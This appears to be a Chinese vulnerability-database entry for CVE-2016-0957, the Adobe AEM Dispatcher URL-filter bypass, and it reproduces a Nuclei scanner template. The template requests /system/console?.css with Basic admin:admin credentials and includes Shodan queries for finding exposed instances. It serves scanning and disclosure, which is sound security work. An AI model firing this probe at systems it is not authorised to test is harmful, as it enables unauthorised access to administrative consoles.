CVE-2016-0957: Adobe AEM Dispatcher <4.15 - Rules Bypass

日期: 2025-08-01 | 影响软件: Adobe AEM Dispatcher | POC: 已公开

漏洞描述

Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.

PoC代码[已公开]

id: CVE-2016-0957

info:
  name: Adobe AEM Dispatcher <4.15 - Rules Bypass
  author: geeknik
  severity: high
  description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
  impact: |
    The vulnerability allows attackers to bypass security rules and potentially gain unauthorized access to sensitive information or perform malicious actions.
  remediation: |
    Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability.
  reference:
    - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
    - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html
    - https://nvd.nist.gov/vuln/detail/CVE-2016-0957
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2016-0957
    epss-score: 0.91105
    epss-percentile: 0.99631
    cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: adobe
    product: dispatcher
    shodan-query:
      - http.component:"Adobe Experience Manager"
      - http.component:"adobe experience manager"
  tags: cve2016,cve,adobe,aem

http:
  - method: GET
    path:
      - "{{BaseURL}}/system/console?.css"

    headers:
      Authorization: "Basic YWRtaW46YWRtaW4K"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Adobe"
          - "java.lang"
          - "(Runtime)"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e84d546bbcf39ae598a2cc66958f3f73065823dec193daa0be70f4ad7b622e7d022019497750c8d67a1a59f79255f1fea39db3d30365e23cfa30fdf55fa5761057c6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐